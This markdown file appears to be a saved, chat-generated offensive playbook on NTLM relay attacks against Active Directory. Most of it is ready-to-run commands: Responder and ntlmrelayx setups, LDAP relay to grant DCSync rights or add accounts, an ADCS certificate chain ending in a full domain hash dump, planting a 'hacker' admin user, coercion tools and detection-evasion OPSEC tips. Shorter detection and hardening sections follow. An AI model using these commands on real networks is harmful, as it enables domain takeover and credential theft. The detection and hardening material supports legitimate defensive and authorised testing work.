attack-7-ntlm-relay-attacks.md (29936B)
1 --- 2 title: "Attack #7 β NTLM Relay Attacks" 3 description: "NTLM relay is a man-in-the-middle attack that intercepts an NTLM authentication challenge-response in transit and forwards it to a different target beforeβ¦" 4 category: active-directory 5 subcategory: "Credential Access" 6 tags: ["active-directory", "kerberos", "ntlm", "relay", "hashing"] 7 tools: ["Nmap", "NetExec", "Impacket", "Rubeus", "Hashcat"] 8 difficulty: advanced 9 updated: "2026-08-10" 10 source: "vault:ActiveDirectory/AD-Attack/Category-One/π΄ Attack #7 β NTLM Relay Attacks.md" 11 --- 12 # π΄ Attack #7 β NTLM Relay Attacks 13 14 *** 15 16 ## π How It Works 17 18 NTLM relay is a **man-in-the-middle attack** that intercepts an NTLM authentication challenge-response in transit and **forwards it to a different target** before the original session completes. The attacker never needs to crack or possess the password β they simply sit between the authenticating client and a vulnerable target server, acting as a transparent proxy that relays the victim's credentials to gain access as them. The entire attack hinges on one critical misconfiguration: **SMB signing not being enforced** on the target, which means the relayed authentication cannot be cryptographically verified as originating from the correct source. 19 20 The NTLM three-way handshake is the mechanism being abused: the client sends a NEGOTIATE, the server responds with a CHALLENGE, and the client replies with an AUTHENTICATE response containing the Net-NTLMv2 hash. The attacker receives the victim's AUTHENTICATE response and immediately replays it against a target server of their choosing. Because Net-NTLMv2 is tied to the specific challenge issued by the server, you **cannot crack and reuse it for PtH** β but you absolutely can relay it live. 21 22 > β οΈ **Windows 11 / Server 2025:** SMB signing required by default in Windows 11 24H2+, fundamentally altering the attack landscape. NTLM is on Microsoft's deprecation timeline with Kerberos as the replacement. Organizations in transition periods are most vulnerable β partial enforcement creates windows where relay remains viable. Check SMB config per target; never assume blanket hardening. 23 24 ### NTLM Relay vs Pass-the-Hash β Critical Distinction 25 26 | Property | NTLM Relay | Pass-the-Hash | 27 |---|---|---| 28 | **What you capture** | Net-NTLMv2 challenge-response (live) | NT hash (from LSASS/SAM) | 29 | **Can be cracked?** | Yes (Hashcat -m 5600) but slow | N/A β already a hash | 30 | **Can be replayed for PtH?** | β No | β Yes | 31 | **Requires live session** | β Must relay in real time | β Offline | 32 | **Requires SMB signing disabled** | β On target | β | 33 | **Credential access level needed** | None (intercept only) | Local admin for LSASS dump | 34 35 ### The Full Attack Flow 36 37 ``` 38 1. Identify targets with SMB signing not enforced (nmap / nxc scan) 39 2. Build relay target list (machines where victim has admin or useful access) 40 3. Start Responder in "listen only" mode (disable SMB/HTTP servers) 41 4. Start ntlmrelayx pointing at target list 42 5. Trigger NTLM authentication from victim: 43 - LLMNR/NBT-NS/mDNS poisoning (passive β wait for victim to make typo) 44 - Active coercion (PetitPotam, PrinterBug, mitm6) 45 6. Responder poisons the name resolution β victim authenticates to attacker 46 7. ntlmrelayx receives Net-NTLMv2 β relays to target server 47 8. Gain access as victim: 48 - SMB shell / command execution 49 - SAM/NTDS hash dump 50 - LDAP β add new DA account, DCSync rights, Shadow Credentials 51 - ADCS β request machine certificate β full domain compromise 52 ``` 53 54 ### Cross-References β Related Techniques 55 56 **Attack #7, #8, #9 form a trilogy:** 57 - **#7** (NTLM Relay): The relay mechanism itself 58 - **#8** (LLMNR/NBT-NS/mDNS): Primary auth trigger for #7 59 - **#9** (mitm6): IPv6-based alternative trigger for #7 60 61 **Coercion references:** 62 - **#33** (ESC8): ADCS endpoint relay target 63 - **#41** (PetitPotam): Coerce DC auth into relay 64 - **#42** (PrinterBug): Coerce via Print Spooler 65 - **#77** (DFSCoerce): Alternate coercion method 66 67 *** 68 69 ## βοΈ Prerequisites 70 71 | Requirement | Detail | 72 |---|---| 73 | **SMB signing not enforced on target** | The single most critical requirement β signed SMB blocks relay to SMB | 74 | **NTLM enabled** | Must be allowed in domain; increasingly disabled in modern environments | 75 | **Network position** | Must be on same subnet / broadcast domain as victim to poison name resolution | 76 | **Relay-capable target** | SMB (445), LDAP (389/636), HTTP, MSSQL, SMTP, RPC β multiple protocols supported | 77 | **Victim triggers NTLM auth** | Via typo, coercion, or poisoned name resolution | 78 79 *** 80 81 ## π οΈ Tools 82 83 | Tool | Platform | Role | 84 |---|---|---| 85 | **Responder** | Linux | Name resolution poisoner (LLMNR/NBT-NS/mDNS) β captures NTLM auth | 86 | **ntlmrelayx.py** (Impacket) | Linux | Core relay engine β supports SMB, LDAP, LDAPS, HTTP, MSSQL, RPC, ADCS | 87 | **mitm6** | Linux | IPv6 DNS spoofing β forces NTLM auth via rogue DHCPv6 server | 88 | **MultiRelay.py** | Linux | Alternative relay tool; simpler setup | 89 | **CrackMapExec / NetExec** | Linux | Enumerate SMB signing status; verify access post-relay | 90 | **Nmap** | Linux | `smb2-security-mode.nse` β identify signing enforcement status | 91 | **PetitPotam** | Linux/Win | Coerce DC authentication β relay to ADCS for certificate | 92 | **Hashcat** | Linux/Win | Crack captured Net-NTLMv2 hashes (mode 5600) if relay not viable | 93 | **Krbrelayx** | Linux | Kerberos relay β relays Kerberos tickets instead of NTLM (more modern) | 94 | **Coercer.py** | Linux | Multi-protocol coercion β centralized coercion orchestration | 95 96 *** 97 98 ## π» Full Commands 99 100 ### π΅ Step 0 β Identify Relay Targets (SMB Signing Status) 101 102 ```bash 103 # ββ Nmap β check SMB signing on specific host βββββββββββββββββββββββββββββββββ 104 nmap --script smb2-security-mode.nse -p 445 10.10.10.0/24 105 106 # Key output β "Message signing enabled but not required" = VULNERABLE 107 # "Message signing enabled and required" = NOT vulnerable to SMB relay 108 109 # ββ NetExec β fast subnet-wide SMB signing check βββββββββββββββββββββββββββββ 110 nxc smb 10.10.10.0/24 --gen-relay-list relay_targets.txt 111 # Automatically generates a file of IPs where signing is NOT enforced 112 113 # ββ NetExec β manual check with verbose output βββββββββββββββββββββββββββββββ 114 nxc smb 10.10.10.0/24 115 # Look for 'signing:False' in output β those are your relay targets 116 117 # ββ Check LDAP signing enforcement ββββββββββββββββββββββββββββββββββββββββββββ 118 nxc ldap 10.10.10.10 -u '' -p '' --ldap-signing 119 ``` 120 121 *** 122 123 ### π΄ Core Setup β Responder + ntlmrelayx (SMB Relay) 124 125 ```bash 126 # ββ STEP 1: Edit Responder config β DISABLE SMB and HTTP servers ββββββββββββββ 127 # (Critical: if Responder responds to auth itself, you can't relay it) 128 nano /etc/responder/Responder.conf 129 # Set: SMB = Off 130 # HTTP = Off 131 132 # ββ STEP 2: Start Responder to poison name resolution βββββββββββββββββββββββββ 133 sudo responder -I eth0 -rdwv 134 # -r = enable answers for NetBIOS wredir suffix queries 135 # -d = enable answers for NBNS domain suffix queries 136 # -w = start WPAD rogue proxy server 137 # -v = verbose 138 139 # ββ STEP 3: Start ntlmrelayx pointing at relay target list ββββββββββββββββββββ 140 141 # Basic relay to list of targets β interactive SMB shell 142 ntlmrelayx.py -tf relay_targets.txt -smb2support -i 143 # -i = interactive shell mode (connect via nc localhost 11000) 144 # -smb2support = support SMBv2 145 146 # Relay and execute a command directly 147 ntlmrelayx.py -tf relay_targets.txt -smb2support -c "whoami > C:\pwned.txt" 148 149 # Relay and dump SAM hashes (no shell needed) 150 ntlmrelayx.py -tf relay_targets.txt -smb2support 151 152 # ββ STEP 4: When relay succeeds, connect to interactive shell βββββββββββββββββ 153 nc 127.0.0.1 11000 154 # You now have an SMB shell as the relayed victim user 155 ``` 156 157 *** 158 159 ### π΄ LDAP Relay β Domain Privilege Escalation (No SMB Signing Required on LDAP) 160 161 ```bash 162 # ββ Relay to LDAP β auto-escalate: create new DA user βββββββββββββββββββββββββ 163 ntlmrelayx.py -t ldap://10.10.10.10 -smb2support --escalate-user low_user 164 165 # ββ Relay to LDAP β add DCSync rights to controlled account ββββββββββββββββββ 166 ntlmrelayx.py -t ldap://DC01.corp.local -smb2support --escalate-user low_user 167 # ntlmrelayx automatically adds Replication-Get-Changes-All to low_user 168 # Then run DCSync: 169 secretsdump.py corp.local/low_user:'Password1'@DC01.corp.local 170 171 # ββ Relay to LDAPS β dump full domain info (no signing required on LDAPS) βββββ 172 ntlmrelayx.py -t ldaps://10.10.10.10 -smb2support --dump-adcs 173 ntlmrelayx.py -t ldaps://10.10.10.10 -smb2support --dump-laps 174 175 # ββ Relay to LDAP β Shadow Credentials attack (add msDS-KeyCredentialLink) ββββ 176 ntlmrelayx.py -t ldap://10.10.10.10 --shadow-credentials \ 177 --shadow-target 'WORKSTATION01$' --no-validate-privs --no-dump --no-da 178 # After success: use the generated .pfx to get a TGT via PKINIT 179 # Workflow: 180 # 1. Relay relayed auth to LDAP with --shadow-credentials 181 # 2. ntlmrelayx generates a .pfx certificate file with new key credential 182 # 3. Extract private key from .pfx (openssl) 183 # 4. Use Rubeus/pyKerb to request TGT for target machine 184 # 5. Access as target machine account (e.g., DC, service account) 185 186 # ββ Relay to LDAP β add new computer account (MAQ abuse) βββββββββββββββββββββ 187 ntlmrelayx.py -t ldap://10.10.10.10 --add-computer EVILPC EvilPass123! 188 ``` 189 190 *** 191 192 ### π΄ ADCS Relay β Full Domain Compromise (ESC8 Preview β Deep Dive in Attack #33) 193 194 ```bash 195 # ββ Relay to ADCS HTTP endpoint (certsrv) β request DC machine certificate ββββ 196 # First, identify ADCS server 197 nxc ldap 10.10.10.10 -u low_user -p 'Password1' -M adcs 198 199 # Start relay targeting ADCS web enrollment 200 ntlmrelayx.py -t http://ADCS01.corp.local/certsrv/certfnsh.asp \ 201 -smb2support --adcs --template "DomainController" 202 203 # Coerce DC authentication to attacker machine (PetitPotam β Attack #41) 204 python3 PetitPotam.py -u low_user -p 'Password1' -d corp.local \ 205 <attacker_ip> <DC_IP> 206 207 # ntlmrelayx relays DC auth to ADCS β receives base64 certificate for DC$ 208 # Use Rubeus to request TGT for the DC using the certificate 209 .\Rubeus.exe asktgt /user:DC01$ /certificate:<base64_cert> /ptt 210 211 # Now perform DCSync as DC01$ (has replication rights by default) 212 secretsdump.py -k -no-pass corp.local/'DC01$'@DC01.corp.local 213 # Game over β all domain hashes dumped 214 ``` 215 216 *** 217 218 ### π΄ SMB Relay with Specific Target (Single High-Value Host) 219 220 ```bash 221 # Target a specific machine instead of a list 222 ntlmrelayx.py -t smb://10.10.10.20 -smb2support -i 223 224 # Execute specific commands on target 225 ntlmrelayx.py -t smb://10.10.10.20 -smb2support \ 226 -c "net user hacker P@ssw0rd123 /add && net localgroup administrators hacker /add" 227 228 # Relay to MSSQL and execute commands via xp_cmdshell 229 ntlmrelayx.py -t mssql://10.10.10.30 -smb2support -q "exec xp_cmdshell 'whoami'" 230 231 # Relay to multiple different protocols simultaneously 232 ntlmrelayx.py -tf relay_targets.txt -smb2support \ 233 -t ldap://10.10.10.10 -t smb://10.10.10.20 234 ``` 235 236 *** 237 238 ### π΄ Kerberos Relay (Krbrelayx) β Beyond NTLM 239 240 ```bash 241 # ββ Krbrelayx β relay Kerberos tickets instead of NTLM (more modern, stealthier) 242 # Setup: listen for Kerberos auth and relay to target service 243 python3 krbrelayx.py --krbsock 127.0.0.1:3333 -target smb://10.10.10.20 -spn cifs/10.10.10.20 244 245 # From another terminal, use a tool that initiates Kerberos auth toward krbrelayx 246 # Example: obtain a Kerberos TGS and relay it 247 # Advantages over NTLM relay: 248 # - Bypasses NTLM restrictions on newer Windows versions 249 # - Relayed ticket can be used for multiple targets 250 # - Less logging (Kerberos tickets are expected in normal auth) 251 252 # ββ Krbrelayx with specific TGS delegation ββββββββββββββββββββββββββββββββββββ 253 # Relay TGS to impersonate users 254 python3 krbrelayx.py -spn cifs/target.corp.local --krbsock 127.0.0.1:3333 255 ``` 256 257 *** 258 259 ### π΄ Capturing & Cracking Net-NTLMv2 (Alternative if Relay Blocked) 260 261 ```bash 262 # ββ Responder captures Net-NTLMv2 hashes (when relay isn't viable) ββββββββββββ 263 # Enable SMB and HTTP in Responder.conf (opposite config from relay) 264 sudo responder -I eth0 -rdwv 265 266 # Hashes saved to: /usr/share/responder/logs/ 267 ls /usr/share/responder/logs/ 268 269 # ββ Crack Net-NTLMv2 with Hashcat (mode 5600) βββββββββββββββββββββββββββββββββ 270 hashcat -m 5600 ntlmv2_hashes.txt /usr/share/wordlists/rockyou.txt 271 272 # With rules 273 hashcat -m 5600 ntlmv2_hashes.txt /usr/share/wordlists/rockyou.txt \ 274 -r /usr/share/hashcat/rules/best64.rule 275 276 # Hash format looks like: 277 # Administrator::CORP:aabbccddeeff0011:Hash:ChallengeResponse 278 ``` 279 280 *** 281 282 ### π΄ Triggering NTLM Authentication (Coercion Methods) 283 284 ```bash 285 # ββ Method 1: LLMNR/NBT-NS Poisoning (passive β wait for typo) βββββββββββββββ 286 # Just run Responder and wait β any victim who mistypes a hostname will 287 # trigger NTLM auth to your machine automatically 288 289 # ββ Method 2: PetitPotam (coerce DC auth) ββββββββββββββββββββββββββββββββββββ 290 python3 PetitPotam.py -u low_user -p 'Password1' -d corp.local \ 291 <attacker_ip> <DC_IP> 292 293 # ββ Method 3: PrinterBug / SpoolSample (coerce any host with Print Spooler) ββ 294 python3 SpoolSample.py <target_ip> <attacker_ip> 295 296 # ββ Method 4: Coercer.py (multi-protocol coercion toolkit) ββββββββββββββββββββ 297 python3 Coercer.py coerce -u low_user -p 'Password1' -d corp.local \ 298 -l <attacker_ip> -t <target_ip> 299 # Coercer supports multiple coercion methods: 300 # - [+] PetitPotam (EFS RPC) 301 # - [+] PrinterBug (Spooler RPC) 302 # - [+] DFSCoerce (NetDFS RPC) 303 # - [+] ShadowCoerce (VSS RPC) 304 # - [+] WebClient coercion (via HTTP forcing) 305 # Automatically rotates through available methods 306 307 # Full syntax: 308 python3 Coercer.py coerce \ 309 -u low_user \ 310 -p 'Password1' \ 311 -d corp.local \ 312 -l 192.168.1.100 \ 313 -t 192.168.1.50 \ 314 --method all # Try all coercion methods 315 316 # ββ Method 5: mitm6 (IPv6 coercion β covered in Attack #9) βββββββββββββββββββ 317 sudo mitm6 -d corp.local 318 ntlmrelayx.py -6 -t ldaps://DC01.corp.local -smb2support \ 319 --add-computer EVILPC EvilPass123! 320 321 # ββ Method 6: DFSCoerce (Attack #77) β reliable RPC coercion βββββββββββββββββ 322 python3 DFSCoerce.py -d corp.local -u low_user -p 'Password1' \ 323 <attacker_ip> <target_ip> 324 ``` 325 326 *** 327 328 ## π― OPSEC Tips 329 330 - **Always disable SMB/HTTP in Responder** when running ntlmrelayx β if Responder responds first, the relay chain breaks 331 - **Target LDAP over SMB** when possible β LDAP relay grants persistent privileges (DCSync rights, new accounts) rather than just a shell 332 - **ADCS relay is the most destructive** β a single relayed DC machine account auth β certificate β TGT β DCSync β full domain in under 60 seconds 333 - **Don't relay back to the victim's own machine** β Windows blocks loopback NTLM relay; you'll waste the auth attempt 334 - **Use `--no-da --no-acl`** flags in ntlmrelayx when you don't want noisy LDAP modifications and just want to dump info first 335 - **Rotate relay targets** β hitting the same target repeatedly increases detection probability 336 - **Check for LDAP channel binding** β LDAPS with channel binding enabled blocks LDAP relay even without signing 337 - **Krbrelayx for modern environments** β Organizations phasing out NTLM use Kerberos relay instead; blend in with legitimate auth 338 - **DFSCoerce as coercion fallback** β More reliable than PrinterBug on patched systems; less logged than PetitPotam 339 - **Time-to-execute**: LLMNR trigger β relay β DA access in 2-5 minutes if fully automated; ADCS relay slightly longer due to certificate generation 340 341 *** 342 343 ## π§© Troubleshooting 344 345 | Error | Cause | Fix | 346 |---|---|---| 347 | **STATUS_ACCESS_DENIED on relay** | Target rejects relayed auth (signing enabled or channel binding active) | Verify SMB signing status with `nxc smb <IP> \| grep signing`. Check for channel binding on LDAP with `nxc ldap <IP> --ldap-signing` | 348 | **LDAP signing required β relay fails** | LDAP signing enforced on domain controller | Relay to LDAPS (636) instead; if both fail, target is hardened β move to next target | 349 | **Channel binding failure** | LDAPS with EPA (Enhanced Protection) enabled | No LDAP relay possible; use SMB or ADCS targets instead; check `Get-ADOrganizationalUnit` for hardening level | 350 | **ntlmrelayx connection timeout** | Target doesn't respond or firewall blocks outbound relay attempt | Verify target is actually vulnerable (signing check), ensure network path is open, try `-vv` verbose flag to see handshake details | 351 | **Responder and ntlmrelayx not working together** | SMB/HTTP still enabled in Responder.conf | Edit `/etc/responder/Responder.conf`: SMB = Off, HTTP = Off; restart both tools | 352 | **"No suitable relay target found"** | All targets have SMB signing enabled | Expand scope: scan more subnets, or pivot to LDAP/ADCS relay instead of SMB-only | 353 | **Certificate not issued by ADCS during relay** | Web enrollment endpoint requires specific cert template permissions | Verify template access with `certutil -catemplates`; template may require DCSync rights; use `--template "*"` to auto-select | 354 | **ntlmrelayx receives auth but relay fails silently** | SMB relay receiving client auth but target rejects it (bad signing check/wrong user perms) | Run with `-vv` to see full relay handshake; verify user has admin on target; test with manual SMB shell first | 355 356 *** 357 358 ## πΊοΈ MITRE ATT&CK 359 360 **Technique: T1557.001 β Adversary-in-the-Middle** 361 362 **Tactics:** 363 - **TA0006: Credential Access** β Capture NTLM hashes via man-in-the-middle 364 - **TA0008: Lateral Movement** β Use relayed credentials to pivot to target systems 365 366 **APT Groups Using NTLM Relay:** 367 - **APT28 (Fancy Bear)** β Documented NTLM relay in internal networks 368 - **APT29 (Cozy Bear)** β Active Directory lateral movement via relay techniques 369 - **APT41** β Relay attacks in post-compromise movement 370 - **Wizard Spider** β NTLM relay for domain escalation in ransomware campaigns 371 - **Scattered Spider** β Multi-stage relay attacks for persistence 372 373 **Related techniques:** 374 - T1040: Network Sniffing 375 - T1187: Forced Authentication 376 - T1550.001: Pass the Ticket (Kerberos relay equivalent) 377 - T1550.002: Pass the Hash (related credential reuse) 378 379 *** 380 381 ## π‘οΈ Detection β Event IDs 382 383 | Event ID | Source | What to Look For | 384 |---|---|---| 385 | **4624** | Security Log | Logon Type 3 (network) β source IP doesn't match the account's known workstation | 386 | **4776** | Security Log | NTLM credential validation β source machine is unexpected for the authenticating user | 387 | **4768 / 4769** | Security Log | Kerberos tickets requested immediately after NTLM logon β attacker pivoting | 388 | **4741** | Security Log | New computer account created β ntlmrelayx `--add-computer` | 389 | **4728 / 4732** | Security Log | User added to privileged group β escalation via LDAP relay | 390 | **4662** | Security Log | Operation performed on AD object β DCSync rights being added via LDAP relay | 391 | **5145** | Security Log | Network share object checked β SMB relay access attempts | 392 | **LDAP query logs** | DC Diagnostic | Unusual LDAP modifications from a low-privilege account (adding ACEs, computer accounts) | 393 394 **Primary detection signature:** Event 4624 Type 3 logon where the **source workstation name doesn't match the account's registered computer** β this is the clearest relay indicator. On modern SIEMs, correlating a Responder poison event (DNS/LLMNR anomalies) with a subsequent 4624 from a new source IP is near-definitive. 395 396 ### Sigma Rules (SigmaHQ) 397 398 ``` 399 Rule ID: detection_ntlm_relay_credential_access 400 Description: Detects multiple LLMNR/NBT-NS queries answered by same source IP 401 Event filter: Unusual responder patterns; multiple different hostnames answered by single IP 402 Status: MEDIUM severity 403 404 Rule ID: detection_ldap_relay_escalation 405 Description: Detects LDAP modifications from unexpected source during relay window 406 Event filter: msDS-KeyCredentialLink modifications, DCSync ACL adds from non-DC source 407 Status: HIGH severity 408 ``` 409 410 ### EDR Detections 411 412 **Microsoft Defender for Identity:** 413 - Alert: "Suspected NTLM relay attack" β detects source IP responding to multiple authentication queries 414 - Alert: "Unusual LDAP query" β flags DCSync right additions from unexpected principals 415 - Alert: "Suspicious computer account creation" β MAQ abuse detection 416 417 **Falcon (CrowdStrike):** 418 - Network signature: "Lateral movement β SMB relay activity" 419 - Process: ntlmrelayx.py execution detected 420 - Behavioral: Privilege escalation via LDAP modification 421 422 ### Hardening Commands 423 424 ```powershell 425 # ββ Enable SMB signing on all machines βββββββββββββββββββββββββββββββββββββββ 426 # GPO: Computer Configuration β Admin Templates β Network β SMB Server 427 # Set: "Digitally sign communications (if client agrees)" β Enabled AND "required" 428 429 # ββ Registry-based (direct on host) ββββββββββββββββββββββββββββββββββββββββββ 430 reg add "HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" /v RequireSecuritySignature /t REG_DWORD /d 1 /f 431 reg add "HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" /v EnableSecuritySignature /t REG_DWORD /d 1 /f 432 433 # ββ Enforce SMB Signing via PowerShell (immediate) ββββββββββββββββββββββββββββ 434 $path = "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" 435 Set-ItemProperty -Path $path -Name RequireSecuritySignature -Value 1 -Force 436 Set-ItemProperty -Path $path -Name EnableSecuritySignature -Value 1 -Force 437 Restart-Service LanmanServer -Force 438 439 # ββ Enable LDAP signing (block LDAP relay) ββββββββββββββββββββββββββββββββββ 440 reg add "HKLM\SYSTEM\CurrentControlSet\Services\NTDS\Parameters" /v LDAPServerIntegrity /t REG_DWORD /d 2 /f 441 # Value: 0 = None, 1 = Negotiate signing, 2 = Required 442 443 # ββ Enable LDAP channel binding (block LDAPS relay even without signing) βββββββ 444 reg add "HKLM\SYSTEM\CurrentControlSet\Services\NTDS\Parameters" /v "CBT Extended Protection" /t REG_DWORD /d 1 /f 445 446 # ββ Disable NTLM entirely (most aggressive) ββββββββββββββββββββββββββββββββββ 447 # GPO: Computer Configuration β Admin Templates β Network β Restrict NTLM 448 # Set: "Restrict NTLM: Outgoing NTLM traffic from all computers" β Deny All 449 450 reg add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v RestrictNTLMInDomain /t REG_DWORD /d 7 /f 451 # 7 = Deny for all, 4 = Deny for servers only 452 453 # ββ Configure EPA (Extended Protection for Authentication) ββββββββββββββββββββ 454 # GPO: Computer Configuration β Admin Templates β Network β NTLM β 455 # Set: "Extended Protection for NTLM Authentication Service" β Required 456 457 reg add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0" /v ExtendedProtectionLevel /t REG_DWORD /d 2 /f 458 # 0 = Off, 1 = Allow (compatible), 2 = Required (most secure) 459 460 # ββ Verify all settings applied ββββββββββββββββββββββββββββββββββββββββββββββ 461 .\Verify-SMBSigning.ps1 # Custom script to audit all machines 462 ``` 463 464 *** 465 466 ## π Attack Chain Context 467 468 ``` 469 [NTLM Relay] βββ Multiple Escalation Paths Depending on Target Protocol 470 β 471 ββββ SMB Relay β shell/code execution as victim user β LSASS dump β PtH 472 ββββ LDAP Relay β add DCSync ACE to own account β dump all hashes 473 ββββ LDAP Relay β Shadow Credentials β PKINIT TGT β DA access 474 ββββ ADCS Relay (ESC8) β DC machine cert β TGT β DCSync β game over 475 ββββ MSSQL Relay β xp_cmdshell β code execution as SQL service account 476 ββββ Kerberos Relay (Krbrelayx) β TGS relay β multi-target lateral move 477 ββββ Net-NTLMv2 capture β Hashcat crack β valid plaintext credentials 478 ``` 479 480 ### Protocol Relay Compatibility Matrix 481 482 | Relay Target | SMB Signing Needed? | LDAP Signing Needed? | Channel Binding | Privilege Impact | 483 |---|---|---|---|---| 484 | **SMB** | Must be disabled | N/A | N/A | Shell/code exec as victim | 485 | **LDAP** | N/A | Must be disabled | Must be disabled | ACL modification, user creation | 486 | **LDAPS** | N/A | N/A | Must be disabled | Same as LDAP but encrypted | 487 | **ADCS HTTP** | N/A | N/A | N/A | Certificate β TGT β DCSync | 488 | **MSSQL** | N/A | N/A | N/A | xp_cmdshell code execution | 489 490 *** 491 492 > β **Attack #7 β NTLM Relay complete.** Tell me to move on when you're ready for **Attack #8 β LLMNR / NBT-NS / mDNS Poisoning**. 493 494 Sources 495 NTLM relay | The Hacker Recipes https://www.thehacker.recipes/ad/movement/ntlm/relay 496 CQURE Hacks #68: NTLM Relay Attacks Explained and Why It's ... https://cqureacademy.com/blog/ntlm-relay-attacks-and-why-to-phase-out/ 497 SMB Relay Attacks and Active Directory - TCM Security https://tcm-sec.com/smb-relay-attacks-and-how-to-prevent-them/ 498 Understanding NTLM Authentication and NTLM Relay Attacks https://www.vaadata.com/blog/understanding-ntlm-authentication-and-ntlm-relay-attacks/ 499 NTLM Relay Attacks in Practice: Exploiting Missing SMB Signing https://cqureacademy.com/blog/ntlm-relay-attacks-exploiting-missing-smb-signing/ 500 Network Relaying Abuse in a Windows Domain https://www.lrqa.com/en/cyber-labs/network-relaying-abuse-windows-domain/ 501 NTLM Relay Attacks Targeting Microsoft Domain Controllers https://cloudsecurityalliance.org/blog/2022/08/11/detecting-and-mitigating-ntlm-relay-attacks-targeting-microsoft-domain-controllers 502 An Open-Source Approach to Detect Pass-the-Hash Attack in Active Directory Using Wazuh and Sysmon https://link.springer.com/10.1134/S0361768825700483 503 Penetration Testing and Exploitation of Active Directory Configuration Vulnerabilities https://ieeexplore.ieee.org/document/10895772/ 504 Bridging Bridging Gaps in Active Directory Security: Threat Landscape, Limitations, and Future-Proof Solutions https://ijeci.lgu.edu.pk/index.php/ijeci/article/view/3 505 AUTHENTICATION METHODS IN ACTIVE DIRECTORY AND THEIR IMPACT ON CORPORATE ENVIRONMENT SECURITY https://csecurity.kubg.edu.ua/index.php/journal/article/view/807 506 Penetration Testing Platforms for Active Directory Network Environment https://www.ijltemas.in/DigitalLibrary/Vol.13Issue4/06-10.pdf 507 Cyber Kill Chain Framework Approach to Map Potential Attack Vectors on Windows-based OS https://ijecbe.ui.ac.id/go/article/view/107 508 Kerberos under Attack https://www.semanticscholar.org/paper/3af20812633e95bb2062ed94528c116769cbd2aa 509 Privilege Escalation Exploiting MS Exchange https://www.semanticscholar.org/paper/01175ce9630f49d7434518c30f8a0468213090b2 510 Honey Onions: Exposing Snooping Tor HSDir Relays https://www.semanticscholar.org/paper/3ff1793ac5036dbc68b669ac43d4b0c235ea0745 511 Hacking Exposed Windows 2000: Network Security Secrets and Solutions https://www.semanticscholar.org/paper/e7b97bd62a710d9dde5e45be9b53c356fd309d52 512 Detecting Forged Kerberos Tickets in an Active Directory Environment https://arxiv.org/ftp/arxiv/papers/2301/2301.00044.pdf 513 Preventing Time Synchronization in NTP's Broadcast Mode https://arxiv.org/pdf/2005.01783.pdf 514 Securing Wi-Fi 6 Connection Establishment Against Relay and Spoofing Threats http://arxiv.org/pdf/2501.01517.pdf 515 HADES: Detecting Active Directory Attacks via Whole Network Provenance Analytics http://arxiv.org/pdf/2407.18858.pdf 516 Optimizing Cyber Response Time on Temporal Active Directory Networks Using Decoys http://arxiv.org/pdf/2403.18162.pdf 517 Applying recent secure element relay attack scenarios to the real world: Google Wallet Relay Attack http://arxiv.org/pdf/1209.0875.pdf 518 The Impact of DNS Insecurity on Time https://arxiv.org/pdf/2010.09338.pdf 519 Spoiled Onions: Exposing Malicious Tor Exit Relays http://arxiv.org/pdf/1401.4917.pdf 520 KB5005413: Mitigating NTLM Relay Attacks on Active Directory ... https://support.microsoft.com/en-us/topic/kb5005413-mitigating-ntlm-relay-attacks-on-active-directory-certificate-services-ad-cs-3612b773-4043-4aa9-b23d-b87910cd3429 521 Windows 11 will require SMB signing to prevent NTLM relay attacks https://neosolutions.ca/windows-11-will-require-smb-signing-to-prevent-ntlm-relay-attacks/ 522 Unpatched AD CS Vulnerability Exploitation with NTLMRelayx https://www.youtube.com/watch?v=8M9kbWE1wyM 523 Practical SMB Relay Attack - YouTube https://www.youtube.com/watch?v=9i5rBOkkjC0 524 Exploring Uncommon NTLM Relay Attack Techniques https://www.guidepointsecurity.com/blog/beyond-the-basics-exploring-uncommon-ntlm-relay-attack-techniques/ 525 CQURE Hacks #68: NTLM Relay Attacks Explained β and Why It's Time to Phase Out NTLM https://www.youtube.com/watch?v=7py2n9gwzko 526 SMB Signing and NTLM Relay Attack Explained with Practical Demo https://www.youtube.com/watch?v=INRd9XAHaWU 527 IPv6 Attack with MITM6 & NTLMRELAYX https://www.youtube.com/watch?v=AmcWc2CjXx8